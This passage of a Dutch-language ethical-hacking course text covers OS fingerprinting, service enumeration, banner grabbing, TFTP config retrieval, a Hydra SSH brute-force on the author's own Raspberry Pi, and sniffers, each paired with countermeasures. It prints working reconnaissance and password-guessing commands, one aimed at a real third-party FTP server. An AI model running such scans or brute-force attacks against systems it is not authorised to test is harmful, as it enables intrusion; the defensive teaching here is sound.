6.6.1 Snort IDS Dit is een goede applicatie om poortscans op te sporen en te rapporteren. Dit programma heeft niet
de mogelijkheid om een poortscan tegen te houden, wel om te rapporten wanneer er een
plaatsvindt of plaatsgevonden heeft.
6.6.2 Treshold logging Treshold loggin is een methode die je kan gebruiken om je log eerst te groeperen voor hem door te
zenden naar uw e-mail adres of computer. Je zou dit kunnen doen om een goed overzicht te houden
van de situatie. Het is niet de bedoeling dat je bij een aanval voor elk pakket een e-mail krijgt. Want
dan zou je mailbox overspoeld worden met e-mails en dan heb je geen overzicht meer van de
situatie.
6.6.3 Onnodige services afzetten Iets wat je zeker zou moeten doen is al je onnodige services afzetten waardoor de overeenkomstige
poorten gesloten zullen worden. Je kan dit, zowel in UNIX als in Windows doen.
UNIX: in het bestand /etc/inetd.conf voor al de onnodige services een “#” plaatsen
Windows: Control panel en hierna Services kiezen
6.6.4 Voorzichtig te werk gaan met tegenmaatregels Als je een poortscan tegenhoudt door het IP-adres te blokkeren van de persoon die de poortscan
uitvoert kan het zijn dat je een medewerker blokkeert die er niets mee te maken heeft. Het kan zijn
dat de aanvaller zijn IP-adres veranderd heeft in een IP-adres van een medewerker, om zo zijn
identiteit te verdoezelen.
60
7 Raden naar het besturingssysteem Op dit moment weten we welke toestellen actief zijn op het netwerk en op welke services op deze
toestellen actief zijn. Hierdoor weet je dus ook welke poorten openstaan. Het volgende dat we
moeten doen is achterhalen welk besturingssysteem aanwezig is op de doelcomputer. Dit kan je op
verschillende manieren doen:
Met de poorten te analyseren kan je een gok doen maar zeker niet met zekerheid zeggen welk
besturingssysteem op de doelcomputer geïnstalleerd staat.
Poorten analyseren
o Windows: poorten 135, 139 en 445
o UNIX: poorten 22, 111, 512-514, 2049 en > 3277
Je kan ook aan stack fingerprinting doen, dit is veel betrouwbaarder maar duurt wel langer.
Fingerprinting
o Active stack fingerprinting: hiermee zal je actief pakketten naar de doelcomputer
sturen. Dit kan gelogd worden door het systeem waardoor je buitengesloten kan
worden.
o Passive stack fingerprinting: hiermee zal je in het netwerk luisteren naar de
pakketten die voorbijgaan. Hieruit kan je afleiden waar welk toestel staat zonder dat
iemand hier iets van te weten komt.
7.1 Active Stack Fingerprinting Active Stack fingerprinting is een manier om te achterhalen welk besturingssysteem actief is op de
doelcomputer. Je stuurt verschillende pakketten naar de doelcomputer en afhankelijk van zijn
reactie, kan je afleiden welk besturingssysteem gebruikt wordt.
Commando met Nmap: nmap –O 192.168.1.1
Resultaat:
root@bt:~# nmap -O 192.168.1.20
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-24 14:36 CET
Nmap scan report for 192.168.1.20
Host is up (0.0062s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open icslap
49159/tcp open unknown
MAC Address: 4C:0F:6E:2C:C5:F6 (Hon Hai Precision Ind. Co.)
Device type: general purpose|phone
Running: Microsoft Windows 7|Vista|2008|Phone
OS CPE: cpe:/o:microsoft:windows_7::-:professional
cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
cpe:/o:microsoft:windows_server_2008::sp1
cpe:/o:microsoft:windows
OS details: Microsoft Windows 7 Professional, Microsoft Windows Vista SP0
or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2,
Windows 7 SP1, or Windows Server 2008, Microsoft Windows Phone 7.5
Network Distance: 1 hop
61
OS detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.90 seconds
Nmap heeft in de achtergrond de IP stack van de computer die ik laten analyseren heb, geanalyseerd
volgens onderstaande eigenschappen. Om dit te kunnen doen, heeft Nmap wel minstens 1 open
poort nodig:
FIN probe
Bogus flag probe
Initial Sequence Number (ISN) sampling
“Don’t fragment bit” monitoring
TCP initial window size
ACK value
ICMP error message quenching
ICMP message quoting
ICMP error message – echoing integrity
Type of service (TOS)
Fragment handling
TCP options
Als Nmap geen open poorten vindt, zal hij raden naar het besturingssysteem en zelfs dan kan Nmap
juist raden naar het besturingssysteem.
Op de computer die ik laten scannen heb, is het besturingssysteem Microsoft Windows 7 home
Premium geïnstalleerd. Als we de scan analyseren komen we tot het besluit dat de scan gelukt is en
uit de scan is gebleken dat er Microsoft Windows 7 op de computer geïnstalleerd staat.
7.2 Passive Stack Fingerprinting Passive stack fingerprinting is een manier om te weten te komen welk besturingssysteem op de
doelcomputer geïnstalleerd staat. Je zal in het netwerk luisteren naar de pakketten die voorbijgaan.
Bij deze manier is het wel noodzakelijk om op een centrale plek op het netwerk te zijn.
Je zal pakketten analyseren en kijken naar de volgende zaken:
TTL: wat is de grootte van de time-to-live.
Window size: wat is de window size?
DF: is er een “Don’t fragment bit?”
7.3 Raden naar het besturingssysteem Tegenmaatregels Om tegen te gaan dat Nmap of andere tools je besturingssysteem kunnen vinden, kan je de
dezelfde tools gebruiken als besproken zijn om poortscans tegen te houden, zoals Snort.
Wat je ook kan doen is de broncode van je besturingssysteem wijzigen, zodat je besturingssysteem
op verschillende pakketten anders reageert. Dit is heel moeilijk om uit te voeren en is alleen maar
mogelijk als je er echt in gespecialiseerd bent. Het is immers geen ramp als een hacker je
besturingssysteem te weten komt. Er zijn nog vele andere zaken waarmee je je kan beschermen
tegen aanvallen.
62
8 Processing and storing scan data Als je een groot netwerk hebt en je doet op dat netwerk verschillende scans, dan wordt het
onoverzichtelijk om daar de juiste conclusies uit te trekken. Het is daarom nuttig om de gegevens die
je van de scans behaald hebt in een databank te zetten. Van hieruit heb je een overzichtelijk beeld
van de scan data. Je kan dit doen door het Metasploit framework te gebruiken.
63
Stap 3: Ennumeratie 1 Inleiding In stap twee Scanning zijn we op zoek gegaan naar welke services op welke hosts aanwezig zijn. In
deze stap gaan we hier nog verder op in. We zullen bij Enumeratie overgaan tot het identificeren van
de service en het besturingssysteem. We kunnen hierbij ook te weten komen welke versie hiervan
geïnstalleerd is. Om dit te kunnen doen, zullen we connecties moeten opstellen naar de systemen.
Deze connecties kunnen of zullen gelogd worden door het systeem dat je wil aanvallen, waardoor er
een mogelijkheid bestaat dat je uitgesloten word van het netwerk. Veel van de informatie die je via
deze manier buitmaakt lijkt op het eerste zicht ongevaarlijk, maar met die informatie kan je veel
doen achteraf. Dit wordt nog verder besproken in de volgende stappen, Hacking Unix en Remote
Connectivity.
De services die zullen besproken worden zijn:
FTP: TCP poort 21
Telnet: TCP poort 23
TFTP: TCP/UDP poort 69
IPSec/IKE: UDP poort 500
2 Nmap version scanning Voor we kunnen beginnen met de services te inventariseren, zullen we eerst een scan moeten
uitvoeren om te weten welke services actief zijn achter welke poorten. Dit soort scan is uitgebreid
uitgelegd in Stap 2: scanning. We zullen eerst een poortscan uitvoeren en dan zullen we een versie-
scan uitvoeren. Een poortscan zal naast de poorten informatie plaatsen van wat Nmap denkt over de
service die achter de betreffende poort zit. Deze informatie haalt Nmap uit een tabel met naast elke
poort een standaard service. Met een versiescan zal Nmap actief verschillende zaken uitvoeren om
zo te weten te komen welke service achter welke poort zit.
Zoals je hieronder kan zien weet de TCP SYN scan bij sommige poorten niet over welke service het
gaat, de versiescan weet wel over welke soort poorten het gaat.
64
2.1 TCP SYN poortscan Commando:
root@bt:~# nmap -sS 192.168.1.5
Resultaat:
Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-02 20:40 CET
Nmap scan report for 192.168.1.5
Host is up (0.0040s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
515/tcp open printer
2121/tcp open ccproxy-ftp
MAC Address: 00:1C:F0:1B:28:BB (D-Link)
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
Bij dit soort poortscan kan je zien dat er naast de poorten een service staat. De naam van de service
wordt uit het bestand nmap-services gehaald. Dit is een simpel tekstbestand waar de
overeenkomstige namen uitgehaald worden. Nmap kan dus wel eens verkeerd zijn met deze
benamingen.
2.2 TCP versiescan Commando:
root@bt:~# nmap -sV 192.168.1.5 –p 2121
Resultaat:
Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-02 20:40 CET
Nmap scan report for 192.168.1.5
Host is up (0.0051s latency).
PORT STATE SERVICE VERSION
2121/tcp open ftp Pure-FTPd
MAC Address: 00:1C:F0:1B:28:BB (D-Link)
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
Bij dit soort scan, een TCP versiescan zal Nmap veel verder gaan dan alleen in een bestand te zoeken
naar de overeenkomstige benamingen.
Een versiescan zal de volgende zaken doen:
maakt connectie met de poort
vragen naar feedback
vergelijkt wat hij terugkrijgt met gekende protocollen
deze informatie haalt hij uit het bestand nmap-service-probe
In dit voorbeeld heeft hij eerst poort 2121 aangeschreven als een FTP-proxy. Daarna met de
versiescan is hij tot het besluit gekomen dat dit gaat om een FTP server met een versie van Pure-FTPd
65
3 Basic Banner Grabbing Door Banner Grabbing toe te passen kan je veel te weten komen over het systeem dat je wilt
aanvallen. Bij Banner Grabbing zal je connecteren met de poort waar je meer over te weten wilt
komen. Je zal dan de output analyseren en hieruit kan je veel afleiden.
Je kan verschillende commando’s gebruiken om aan Banner Grabbing te doen, in dit voorbeeld zal
het commando Telnet gebruikt worden.
3.1 Banner Grabbing met Telnet Commando:
root@bt:~# telnet 192.168.1.1 80
Resultaat:
HTTP/1.0 400 Bad Request
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 02 Jan 2014 20:30:08 GMT
Date: Thu, 02 Jan 2014 20:00:08 GMT
Accept-Ranges: bytes
Connection: close
<html>
<head>
<title>400 Bad Request</title>
</head>
<body bgcolor="ffffff">
<h2>400 Bad Request<h2>
<p>
</body>
</html>
Connection to host lost.
Uit het vorige kunnen we afleiden dat er op 192.168.1.1 een webserver aanwezig is op poort 80.
Mocht er zich achter poort 80 niets bevinden, dan zouden we het volgende resultaat krijgen:
Commando:
root@bt:~# telnet 192.168.1.3 80
Resultaat:
Connecting To 192.168.1.3...Could not open connection to the host, on port
80: Connect failed
66
3.2 Banner Grabbing Tegenmaatregels Je kan als netwerk administrator ook beslissen om maar een bepaald aantal hosts toegang te
geven tot die bepaalde poort/service. Zo kan je bijvoorbeeld enkel van de computer van de
administrator een Telnet sessie aanmaken naar de router. Je kan dit doen door netwerk acces control
toe te passen.
De beste beveiliging tegen Banner Grabbing is de poorten die niet nodig zijn uit te schakelen.
Je kan ook de informatie laten aanpassen die te zien is via Banner Grabbing. Op die manier kan er
nauwelijks aan Banner Grabbing gedaan worden.
4 Enumerating veel voorkomende services In dit hoofdstuk zullen we veel voorkomende services inventariseren. De services die zullen
besproken worden zijn:
FTP: TCP poort 21
Telnet: TCP poort 23
TFTP: TCP/UDP poort 69
IPSec/IKE: UDP poort 500
4.1 FTP Enumeration, TCP 21 FTP is een protocol dat steeds minder gebruikt wordt omdat het onveilig is, maar omdat het zo
gemakkelijk is toe te passen wordt het nog steeds gebruikt.
Als je een website laat hosten via Belgacom of een andere ISP, kan je je website beheren via FTP. Je
zal dan een login krijgen tot je eigen persoonlijke ruimte op die FTP-server. Je kan dan HTML-pagina’s
op die FTP-server plaatsen. Hierdoor zal je HTML-pagina, dus website, te zien zijn op het internet.
4.1.1 FTP anonymous access Er zijn FTP-servers die toelaten om anoniem met hun te verbinden. Hierdoor heb je geen controle
over wie wel en niet mag connecteren met je FTP-server.
Om de volgende test uit te voeren heb ik eerst gezocht naar anonieme FTP servers op de site
http://www.ftp-sites.org/.
Commando:
root@bt:~# ftp ftp.c-logic.be, anonymous, ls
Resultaat:
Connected to srvftp.c-logic.be.
220 Microsoft FTP Service
User (srvftp.c-logic.be:(none)): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
ASP
Formulieren
INGEKORT
226 Transfer complete.
ftp: 102 bytes received in 0.01Seconds 14.57Kbytes/sec.
67
Uit het vorige kunnen we afleiden dat de server waar de FTP service op draait, een Microsoft server
is.
FTP is onveilig omdat het al de gegevens verstuurd in gewone tekst dus niet geëncrypteerd. Als er
iemand je verbinding afluistert, kan die persoon te weten komen wat je wachtwoord is en welke
bestanden je via FTP verplaatst.
4.1.2 FTP Tegenmaatregels FTP is een service die je beter niet meer gebruikt. Het is een oude service die ontstaan is als
het internet nog niet zo een gevaarlijke wereld was.
Als je toch gegevens publiek wilt maken doe je dit beter via HTTP en dit om de simpele manier dat je
via HTTP minder gemakkelijk kan te maken hebben met mensen die geïnfecteerde of illegale
bestanden uploaden op je server. Zelf als je FTP zou willen gebruiken is het nog altijd aangeraden om
elke manier van uploaden tegen te houden.
Als je toch FTP wilt gebruiken is het aangeraden om Secure FTP (SFTP) te gebruiken. Dit is een
protocol dat werkt zoals FTP, maar dit protocol zal al de bestanden en tekst die heen en weer gaat
encrypteren met SSH encryptie.
Je kan ook FTP Secure gebruiken. Die zal hetzelfde doen als SFTP, maar deze zal SSL encryptie
gebruiken.
4.2 Telnet Enumeratie, TCP 23 Telnet is een service die veel gebruikt wordt omdat dit het eerste protocol was die remote access
toeliet. Het slechte aan Telnet is dat het al zijn gegevens in gewone tekst zal doorsturen, waardoor
niets geëncrypteerd is, zelf de gebruikersnaam en het wachtwoord niet. Een veel gebruikt alternatief
is Secure Shell (SSH). SSH zal wel encryptie gebruiken voor de gegevens.
4.2.1 System Enumeratie via Telnet Banners Telnet zal meestal een banner laten zien voor je in te loggen via Telnet. Bij een Cisco toestel is dit één
van de volgende:
Commando:
root@bt:~# telnet 192.168.1.1
Resultaat:
User Access Verification.
Password:
Ofwel
User Access Verification.
Username:
Bij de laatste banner kan je ervan uitgaan dat er een vorm van authentication, authorization en
accounting (AAA) aanwezig is. Dit wordt meestal toegepast door het TACACS+ of Radius.
Zoals je kan zien, kan je door dit simpel commando veel te weten komen over de betreffende Telnet
server en het netwerk waar hij op aangesloten is.
68
4.2.2 User Enumeratie via Telnet Je kan nagaan of je een correcte gebruikersnaam of wachtwoord ingevoegd hebt naargelang de
foutmelding die je terugkrijgt van het betreffende systeem.
4.2.3 Telnet Enumeratie Tegenmaatregels Eerst en vooral zou je Telnet niet meer mogen gebruiken, omdat je alles kan afluisteren wat
er ingevoerd wordt. Je zou het alternatief SSH moeten gebruiken.
Als je toch Telnet wilt gebruiken, is er een mogelijkheid om je banner te veranderen zodat het
moeilijker wordt om aan systeem- of gebruiker-enumeratie te doen.
Het is ook aangeraden om gebruikers opnieuw te laten connecteren als er een foute aanmelding
gebeurt.
4.3 TFTP Enumeratie, TCP/UDP 69 TFTP is een service die veel gebruikt wordt om “images” in te laden in toestellen. Onder andere Cisco
gebruikt dit protocol om zijn IOS te upgraden. Bij TFTP zal je de bestandnaam en de plaats waar het
bestand staat, moeten invoeren voor je het bestand kan downloaden. Dit is zowel veilig als onveilig.
Het is veiliger dan FTP, want je krijgt geen overzicht van al de verschillende bestandsnamen en
directories. Maar het is ook onveilig, omdat er bestanden zijn die op een standaard plaats in een
besturingssysteem opgeslagen zijn. In een UNIX systeem zijn er bestanden waar al de
gebruikersnamen en bijhorende gegevens opgeslagen staan. Dit is het bestand: /etc/passwd.
4.3.1 Bestanden kopiëren met een Linux TFTP Server In het volgend voorbeeld wordt er uitgelegd hoe je een bestand kan kopiëren via TFTP naar een
ander systeem.
De volgende tool kan hiervoor gedownload worden:
TFTPD32 (http://tftpd32.jounin.net/tftpd32_download.html)
Commando’s:
root@bt:~# tftp 192.168.1.8
tftp> connect 192.168.1.8
tftp> get TFTPTest.txt TFTPTest.txt
Received 30 bytes in 0.7 seconds
tftp> quit
Resultaat:
root@bt:~# cat TFTPTest.txt
TFTP transfer is succesvol.
4.3.2 Accessing Router/Switch Configurations via TFTP Als je een poortscan uitvoert op een router of switch en je ziet dat poort 69 openstaat dan kan je een
TFTP overdracht uitproberen. Op deze manier kan je gevoelige informatie te weten komen over de
configuratie van de router of switch. Enkele bestanden die gevoelige gegevens bevatten zijn:
running-config
startup-config
.config
config
run
69
4.3.3 TFTP Enumeratie Tegenmaatregels TFTP is een onveilig protocol die je best niet gebruikt. Als je dit protocol toch moet gebruiken
dan zorg je er het beste voor dat de bestanden waar je toegang toe hebt, beperkt zijn. En je zorgt er
ook het beste voor dat het TFTP protocol tegen gehouden wordt aan de rand van je netwerk.
Hierdoor kunnen hackers van buiten je interne netwerk niet aan je TFTP server van binnenin je
netwerk.
4.4 IPSec/IKE, UDP 500 Het is zeer moeilijk om een firewall te kraken zodat deze u doorlaat. De meeste aanvallen gebeuren
van binnenin de onderneming. Als je niet fysiek in de onderneming kan zijn, dan kan je ook nog
gebruik maken van een Virtual Private Network (VPN) die opgesteld is voor de mensen die veilig van
op afstand willen werken. Dit is eigenlijk een tunnel die opgesteld wordt van de computer van de
medewerker tot het netwerk van het bedrijf. Als je in deze tunnel binnenbreekt, ben je dus binnen in
het netwerk. Dit is niet zo simpel. Want IPSec en IKE gebruiken veel methodes om het een hacker
moeilijk te maken om in die tunnel binnen te breken. Er worden vele verschillende soorten encryptie
gebruikt.
4.4.1 Probing IPSec tunnel Om te kunnen binnenbreken in een tunnel, moet je eerst te weten komen welke zaken de IPSec
tunnel gebruikt om een tunnel op te stellen.
Je kan de aanwezigheid van een tunnel niet zomaar te weten komen met een poortscan, omdat een
VPN meestal de pakketten zal laten vallen die niet aan een bepaald formaat voldoen.
De volgende tool kan hiervoor gedownload worden: ike-scan van NTA Monitor (www.nta-
monitor.com/tools/ike-scan)
Commando:
root@bt:~# ike-scan 192.168.1.1
Resultaat:
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-
scan/)
192.168.1.1 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-
R=0e803d2b90649737)
Ending ike-scan 1.9: 1 hosts scanned in 0.014 seconds (72.26 hosts/sec). 0
returned handshake; 1 returned notify
4.4.2 IPSec/IKE Enumeratie Tegenmaatregels Om een ike-scan tegen te houden, kan je instellen dat er alleen maar naar deze poort mag
gevraagd worden vanaf specifieke IP-adressen. Dit kan je wel alleen maar doen met een Site-to-Site
VPN waar het IP-adres onveranderd blijft.
Het vorige is zeer moeilijk uit te voeren als je ook de mogelijkheid wil geven om een VPN op te stellen
van op een publiek netwerk waar het IP-adres dynamisch verkregen is, via DHCP. In dit geval is het
aangeraden om met een sterk wachtwoord of certificaten te werken.
70
71
Stap 4: Hacking Unix 1 Inleiding In de vorige stappen was het, het doel om het netwerk in kaart te brengen en informatie te krijgen
over de verschillende aanwezige systemen en protocollen en waar deze aanwezig zijn in het netwerk.
In deze stap zullen we proberen binnen te breken in die specifieke services. Het doel van deze stap
zullen doen is toegang te krijgen tot de systemen en waar het kan “root access” proberen te
verkrijgen op de systemen.
Deze stap heet “Hacking Unix”. Er bestaat ook een stap “Hacking Windows” maar omdat de meeste
servers bestaan uit Unix-servers hebben we geopteerd om enkel “Hacking Unix” te bespreken.
2 Brute-force Aanval Een Brute-force aanval is één van de oudste aanvalsvormen die er bestaat. Deze aanvalsvorm bestaat
uit het raden naar wachtwoorden en gebruikersnamen. Dit kan niet bij elke service. De meest
gebruikte services die dit soort van aanval toelaten, als je ze niet goed beveiligd, zijn:
Telnet
File Transfer Protocol (FTP)
De “r” commands (RLOGIN, RSH, enz.)
Secure Shell (SSH)
Simple Network Management Protocol (SNMP) community namen
Lightweight Directory Access Protocol (LDAPv2 en LDAPv3)
Post Office Protocol (POP)
Internet Message Access Protocol (IMAP)
Hypertext Transport Protocol (HTTP)
Hypertext Transport Protocol Secure (HTTPS)
Concurrent Version System (CVS)
Subversion (SVN)
Postgres
MySQL
Oracle
2.1 Brute-force aanval toepassen Om een brute-force aanval toe te passen kan je eerst een “Finger-“, “Rusers-” of “Sendmail-”aanval
plegen om gebruikersnamen te bemachtigen. Je kan dan deze gebruikersnamen gebruiken om je
aanval mee uit te voeren. Het is mogelijk om een brute-force aanval manueel uit te voeren, al wordt
dit meestal overgelaten aan tools die hiervoor gemaakt zijn.
De volgende brute-force aanval vindt plaats in een thuisomgeving en het toestel dat betrokken is bij
deze aanval is eigen eigendom.
Het toestel dat aangevallen wordt is een Raspberry Pi. Om deze aanval in te
leiden heb ik al de default gebruikersnamen en wachtwoorden opgezocht, ik
heb deze in de documenten gebruikersnaam.txt en wachtwoord.txt
geplaatst. De tool, Hydra is gebruikt omdat deze de meest populaire tool is
op het vlak van brute-force aanvallen. Figuur 2-1 Raspberry Pi
72
Commando:
root@bt:~# hydra -L gebruikersnaam.txt -P wachtwoord.txt 192.168.1.6 ssh
Resultaat:
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes
only
Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-04 17:57:34
[DATA] 16 tasks, 1 server, 25 login tries (l:5/p:5), ~1 try per task
[DATA] attacking service ssh on port 22
[STATUS] attack finished for 192.168.1.6 (waiting for children to finish)
[22][ssh] host: 192.168.1.6 login: pi password: raspberry
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-04 17:57:51
Uit het voorbeeld kunnen we de volgende zaken afleiden:
Er zijn 5 wachtwoorden en 5 gebruikersnamen opgegeven, wat zorgt voor 25 mogelijkheden.
De service SSH op poort 22 zal worden aangevallen.
De gebruikersnaam en het wachtwoord zijn geraden, gebruikersnaam: pi wachtwoord:
raspberry.
2.2 Brute-Force aanval Tegenmaatregels De beste verdediging tegen een brute-force aanval is ervoor zorgen dat je sterke
wachtwoorden bedenkt, of een programma die wachtwoorden laat genereren. Je mag zeker niet de
default ingestelde wachtwoorden en gebruikersnamen laten staan. Als je in een bedrijf beslist over
welke wachtwoorden de gebruikers mogen kiezen kan je enkele voorwaarden opleggen.
Enkele goede voorwaarden zijn:
minimum passwoord lengte
maximum aantal weken dat je hetzelfde wachtwoord kan behouden
niet toelaten om twee keer hetzelfde wachtwoord te gebruiken
minimum aantal karakters uit het alfabet
minimum aantal nummers
minimum aantal speciale karakters
minimum aantal kleine letters
minimum aantal hoofdletters
Naast aan je gebruikers goede wachtwoorden te laten kiezen kan je nog enkele andere zaken
implementeren in je systeem, zodat een brute-force aanval veel langer zal duren of zelf niet zal
lukken:
elke keer als er een verkeerde login plaatsvindt, de verbinding verbreken
elke keer als er een verkeerde login plaats vindt, pas na 20 seconden opnieuw laten proberen
services uitzetten die niet gebruikt worden
ervoor zorgen dat geen enkel wachtwoord twee keer voorkomt in het netwerk
default wachtwoorden veranderen
73
3 File Transfer Protocol File transfer protocol (FTP) is een protocol dat gebruikt wordt om bestanden op en van een server te
halen. De server waar deze bestanden opstaan wordt een FTP server genoemd, de service wordt FTP
genoemd en is te vinden op poort 21.
Hackers zullen deze service misbruiken door illegale bestanden op te slaan bij mensen die een FTP
server hebben en die er niet van bewust zijn dat deze bestanden op hun FTP server aanwezig zijn.
Vele FTP servers laten anonieme toegang toe. Dit wil zeggen dat de gebruikers zonder authenticatie
op de FTP server mogen.
Meestal wordt er op een FTP server slechts een gedeelte van de hele FTP server opengezet,
bijvoorbeeld alleen een bepaalde map. Op een FTP server die anonieme toegang toelaat, worden
echter al de bestanden en mappen opengesteld waardoor de aanvallers gevoelige gegevens kunnen
downloaden. Zoals het bestand in /etc/passwd.
Sommige FTP servers hebben boven deze anonieme toegang dan ook nog eens “world writable
directories”. Dit betekent dat al de gebruikers die toegelaten zijn tot het systeem bestanden kunnen
schrijven op de FTP server.
Als een server de anonieme toegang en de “world writable directory” toelaat dan vraag je eigenlijk
naar moeilijkheden. Het is zo goed als zeker dat er iemand zal proberen illegale bestanden op je FTP
server te plaatsen. Dit zal gebeuren omdat het zo gemakkelijk is om toegang te krijgen tot de FTP-
server.
3.1 FTP-server aanvallen Zoals eerder al besproken is het bij UNIX het doel om root access te behalen op het systeem. Er
bestaat een exploit die een “shell” zal creëren op een lokale poort, die gekozen kan worden door de
aanvaller. Hierdoor krijgt de hacker root access op het systeem.
Dit is een exploit gevonden door King Cope op de FreeBSD FTPD en ProFTPD systemen. Als je
geïnteresseerd bent over de werking van deze aanval, kan je het boek Hacking Exposed 7 raadplegen
op pagina 260.
3.2 FTP aanval Tegenmaatregels FTP is een zeer nuttig protocol dat nog zeer veel gebruikt wordt. Als je FTP gebruikt is het
belangrijk dat je nagaat of anonieme toegang nodig is op je systeem. Als dit niet nodig is, gebruik je
dit beter ook niet. Het is altijd beter als je de gasten een account laat aanmaken. Op deze manier kan
ja de handelingen van die accounts nagaan.
Ook is het belangrijk om de hoeveelheid “world writable directories” te beperken tot het minimum.
Ten laatste is het aan te raden om de laatste patches toe te passen om zo de exploits aan het
systeem in te korten.
bron: http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites#Looking_world-
writable_directories
74
4 Secure Shell
4.1 SSH Secure shell (SSH) is een protocol dat zeer veel gebruikt wordt voor remote access. Het is een
protocol dat ontstaan is voor de veiligheid. SSH zal al zijn gegevens die over het netwerk gaan,
encrypteren en SSH zal ook zorgen voor goede authenticatie van de gebruikers.
Er is bij dit protocol ook een mogelijkheid om root-access te behalen. Dit kan je doen op servers van
volgende types:
OpenSSH service van ouder dan 2.3.0
SSH-1.2.24 tot SSH-1.2.31 versie
4.2 SSH Tegenmaatregels Het is belangrijk dat je de SSH service die op je cliënt en server staat blijft updaten tot de
laatste nieuwe versie. Voor meer informatie over SSH best practices:
http://www.cyberciti.biz/tips/linux-unix-bsd-openssh-server-best-practices.html
5 Sniffers
5.1 Wat is een sniffer? Sniffers zijn veelgebruikte programma’s door aanvallers en netwerk administrators. Ze geven de
mogelijkheid om het netwerkverkeer af te luisteren en al de pakketten te laten zien die over het
netwerk verstuurd worden, van en naar de computer waar de sniffer opstaat.
5.2 Aanvaller Wat een aanvaller zal doen is root access proberen te krijgen in een systeem. Op een systeem dat op
het netwerk staat zal hij een sniffer plaatsen. Hierdoor zal hij de mogelijkheid hebben om al het
netwerkverkeer af te luisteren en wachtwoorden, gebruikersnamen en documenten buit te maken.
5.3 Administrator Een netwerkadministrator zal een sniffer gebruiken om meer te weten te komen over zijn eigen
netwerk. Als hij iets geïmplementeerd heeft en het werkt niet meteen, zal hij een sniffer gebruiken
om te achterhalen wat er gebeurt met de pakketten die verstuurd worden op het netwerk.
5.4 Hoe werkt een sniffer? Een ethernet sniffer werkt samen met de Network Interface Card (NIC). Een NIC zal normaal alleen
maar al het verkeer dat voor hem bestemd is ontvangen. Een sniffer zal hier verandering in brengen.
Eerste zal een sniffer de NIC in staat stellen om al het verkeer af te luisteren dat voorbijkomt, ook al
het verkeer dat niet voor hem bestemd is. Dit wil zeggen dat de sniffer de NIC in “promicious mode”
zal plaatsen. Op dit moment kan je de sniffer aanzetten en zal deze al het verkeer analyseren en op je
scherm laten zien.
Een sniffer wordt meestal gebruikt op een plaats in het netwerk waar veel verkeer is, of waar kritieke
zaken gedaan worden op het netwerk. Bijvoorbeeld op de computer van de administrator, of op de
router die in verbinding staat met het internet.
5.5 Voorbeeld van een sniffer Een sniffer die veel gebruikt wordt op Windows en op UNIX computers is Wireshark.
Wireshark kan gedownload worden van http://www.wireshark.org/download.html.
75
De volgende afbeelding illustreert de start van de sniffer Wireshark. Op dit scherm moet je de
interface kiezen waarop je wil afluisteren en dan op start klikken.
Figuur 5-1 Wireshark startscherm
Op de volgende figuur kan je zien dat Wireshark bezig is het netwerk te sniffen. Hij zal het netwerk
dus afluisteren en de pakketten analyseren. Op de volgende figuur is er ook een filter geplaatst dit
enkel de ICMP berichten laat zien.
Figuur 5-2 Wireshark Filter ICMP
76
5.6 Populaire sniffers In de volgende tabel zullen de populairste sniffers uitgelegd worden met elk hun downloadpagina en
beschrijving.
Naam Download locatie Beschrijving
Tcpdump http://sourceforge.net/projects/tcpdump Klassieke pakket sniffer die beschikbaar is op vele besturingssystemen.
Snoop Zit ingebouwd in het besturingssysteem Solaris. Solaris is te downloaden via https://solaris.java.net.
Een pakket sniffer die ingebouwd zit in het besturingssysteem Solaris.
Dsniff http://monkey.org/~dugsong/dsniff Één van de sniffers die het meeste mogelijkheden heeft.
Ettercap http://ettercap.github.io/ettercap Een sniffer met de mogelijkheid om arp-poisoning te doen.
Wireshark http://www.wireshark.org/download.html Een freeware sniffer met veel protocol decoders.
Tabel 5-6 Populaire sniffers
5.7 Sniffers Tegenmaatregel Er zijn drie verschillende manieren om sniffers tegen te houden:
migreren naar een switched netwerk topologie
sniffers detecteren
encryptie toepassen, SSH of IPSec
5.7.1 Migreren naar een switched netwerk topologie In een niet switched netwerk topologie wordt er gebruik gemaakt van een hub waardoor al het
verkeer zal gebroadcast worden naar al de hosts. Op deze manier zal het mogelijk zijn om al het
verkeer af te luisteren op één enkele plek op het netwerk. Het is dus noodzakelijk om de broadcasts
te beperken. Dit kan je doen door de hubs te veranderen in switches en waar het nodig en mogelijk
is, een VLAN aan te maken. Dit komt de performantie van het netwerk ten goede.
5.7.2 Sniffers detecteren Je kan sniffers detecteren op verschillende manieren.
Bij host-based detectie kan je verschillende zaken ondernemen om na te gaan of er een sniffer
aanwezig is op de computer:
nakijken of de NIC in promicious mode staat
nakijken of er een sniffer bij de processen zit
nakijken of er een sniffer bij het taakbeheer zit
zoeken naar grote logbestanden, want een sniffer maakt vaak grote logbestanden
5.7.3 Encryptie (SSH, IPSec) Een sniffer zal netwerkverkeer afluisteren, maar als dat netwerkverkeer geëncrypteerd is kan de
persoon die dit netwerkverkeer heeft laten afluisteren er niet veel mee aanvangen. Daarom is het
noodzakelijk om gevoelige gegevens te encrypteren. En je moet zeker ook nagaan of je gegevens
